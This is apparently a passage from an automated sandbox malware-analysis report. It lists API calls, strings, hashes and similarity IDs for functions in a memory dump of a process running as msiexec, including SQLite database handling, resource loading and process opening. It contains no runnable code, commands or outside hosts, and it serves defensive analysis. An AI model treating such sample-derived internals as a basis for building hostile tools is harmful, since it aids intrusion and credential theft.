                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                            • memset.MSVCRT ref: 0044505E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memchrmemset
                                                                            • String ID: PD$PD
                                                                            • API String ID: 1581201632-2312785699
                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                            • String ID:
                                                                            • API String ID: 2163313125-0
                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$wcslen
                                                                            • String ID:
                                                                            • API String ID: 3592753638-3916222277
                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A47B
                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                            • String ID: %s (%s)$YV@
                                                                            • API String ID: 3979103747-598926743
                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                            • String ID: Unknown Error$netmsg.dll
                                                                            • API String ID: 2767993716-572158859
                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                            APIs
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                            • API String ID: 3176057301-2039793938
                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                            APIs
                                                                            Strings
                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                            • database is already attached, xrefs: 0042F721
                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                            • out of memory, xrefs: 0042F865
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                            • API String ID: 1297977491-2001300268
                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                            APIs
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                            • String ID: ($d
                                                                            • API String ID: 1140211610-1915259565
                                                                            • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                            • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                            APIs
                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                            • String ID:
                                                                            • API String ID: 3015003838-0
                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00407E44
                                                                            • memset.MSVCRT ref: 00407E5B
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 59245283-0
                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                            APIs
                                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                            • API String ID: 3510742995-3273207271
                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                            • memset.MSVCRT ref: 00413ADC
                                                                            • memset.MSVCRT ref: 00413AEC
                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                            • memset.MSVCRT ref: 00413BD7
                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                            • String ID: 3A
                                                                            • API String ID: 3300951397-293699754
                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                            • String ID: strings
                                                                            • API String ID: 3166385802-3030018805
                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041249C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                            • String ID: r!A
                                                                            • API String ID: 2791114272-628097481
                                                                            • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                            • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                            • String ID: BIN
                                                                            • API String ID: 1668488027-1015027815
                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00411AF6
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                            • String ID: AE$.cfg$General$EA
                                                                            • API String ID: 776488737-1622828088
                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                            • memset.MSVCRT ref: 0040D906
                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                            • String ID: sysdatetimepick32
                                                                            • API String ID: 1028950076-4169760276
                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: -journal$-wal
                                                                            • API String ID: 438689982-2894717839
                                                                            • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                            • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Dialog$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3975816621-0
                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                            Strings
                                                                            Memory Dump Source
